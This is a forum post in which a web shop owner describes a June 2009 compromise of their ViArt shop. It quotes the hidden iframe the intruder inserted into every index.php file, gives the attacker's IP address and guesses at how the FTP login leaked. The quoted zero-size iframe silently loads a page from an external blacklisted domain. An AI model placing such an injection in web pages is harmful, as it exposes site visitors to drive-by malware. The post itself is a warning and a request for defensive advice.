Just for information to everyone and maybe for you to check your carts!
My shop has had visitors from a hacker during June 2009. The result of their work was discovered by a customer running the AVAST virus scanner. What I have been able to see so far, the hacker was inserting an "iframe" command in all the index.php files:
<!-- ~ --><iframe src="http://livelnternet.net/s/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->"
Checking the access log to my ftp, I can see that the hacker operated from the IP-address: 213.182.197.229, which, according to a search, is located in Riga, Latvia.
The site "http://livelnternet.net", is black-listed by Google, and seems to be hosted in Ukraine.
Except for me the only ones who had my ftp login details were the people at ViArt support (located in Ukraine) and the index.php files had writing rights only for "owner" (-rw-r-r-), which, I suppose, means that they must have been changed by a user logged in to ftp as "owner"
If someone has more experience with such events than I have, I am grateful for tips of how to detect/protect better and also what kind of damage might have been done.
Thanks!
Социальные закладки